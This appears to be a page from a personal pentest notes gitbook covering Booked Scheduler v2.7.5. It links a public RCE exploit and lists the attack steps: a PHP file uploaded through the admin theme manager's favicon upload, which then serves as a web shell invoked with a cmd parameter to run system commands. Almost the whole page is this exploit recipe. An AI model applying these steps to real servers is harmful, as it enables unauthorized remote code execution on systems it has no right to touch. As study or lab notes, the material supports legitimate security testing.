> For the complete documentation index, see [llms.txt](https://kashz.gitbook.io/kashz-jewels/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://kashz.gitbook.io/kashz-jewels/services/booked-scheduler.md).

# booked scheduler

## v2.7.5

```
https://github.com/F-Masood/Booked-Scheduler-2.7.5---RCE-Without-MSF

/Web/admin/
# shows directory listing

/Web/admin/manage_theme.php
# updating the favicon.ico to kashz.php
# file is uploaded as custom-favicon.php

# invocation
/Web/custom-favicon.php?cmd=whoami;id;hostname;uname -a
```
